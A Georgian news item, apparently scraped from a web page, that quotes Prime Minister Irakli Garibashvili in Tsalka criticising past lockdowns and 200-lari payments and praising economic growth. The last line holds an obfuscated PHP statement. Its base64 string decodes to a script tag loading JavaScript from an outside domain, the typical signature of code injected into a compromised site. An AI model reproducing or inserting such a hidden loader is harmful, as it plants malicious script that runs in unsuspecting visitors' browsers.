celsiusi
ავერსი საქკაბელი
პრემიერ-მინისტრმა ირაკლი ღარიბაშვილმა წალკაში მერობის კანდიდატის წარდგენის დროს განაცხადა, რომ წინა პრემიერის დროს ხალხის სახლებში გამოკეტვა და 200 ლარის დარიგება არასწორი და არაეფექტური იყო. 
 
მისივე თქმით, დღეს საქართველო მსოფლიოში მოწინავეა ეკონომიკის ზრდის თვალსაზრისით. 
 
"5 თვის წინ, როცა მე დავინიშნე პრემიერ-მინისტრად, მაშინ ქვეყანაში არც ვაქცინები გვქონდა, ლარი იყო 3.5-ზე, ეკონომიკა იყო ჩაკეტილი და გაჩერებული, გვქონდა კომენდანტის საათი, შეზღუდვები და ასე შემდეგ, იყო სრული პესიმიზმი და ნიჰილიზმი. ამას ემატებოდა ის საბოტაჟი და ხელოვნური პოლიტიკური კრიზისი, რომელიც იყო შექმნილი ქვეყანაში. 
 
დღეს რა ვითარება გვაქვს, ლარი არის სტაბილური, ამას გარდა, ეკონომიკური ზრდის ტემპით ვართ ერთ-ერთი მოწინავე მთელ მსოფლიოში, ყველა ტურისტული ადგილი არის გადაჭედილი, ტურისტებით სავსე, ჩვენი შიდა ტურიზმი ძალიან მაგრად მუშაობს, ხალხი ქმნის დოვლათს და შემოსავალი შესდის ყველა მოქალაქეს და ყველა ოჯახს.
 
 
ჩვენ გავიხსენოთ წინა წელი, როცა გამოვკეტეთ სახლებში ადამიანები და შემდეგ 200 ლარები დავურიგეთ, არის ეს საკმარისი?! იმისთვის, რომ ადამიანმა შეძლოს ნორმალურად ცხოვრება, რა თქმა უნდა, არა, ჩვენ გვინდა რომ გავიმეოროთ იგივე?! მე ვფიქრობ, არა, ამიტომ ჩვენ ეს ოქროს შუალედი უნდა დავიჭიროთ," - განაცხადა ღარიბაშვილმა. 
 
 
 
1656
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");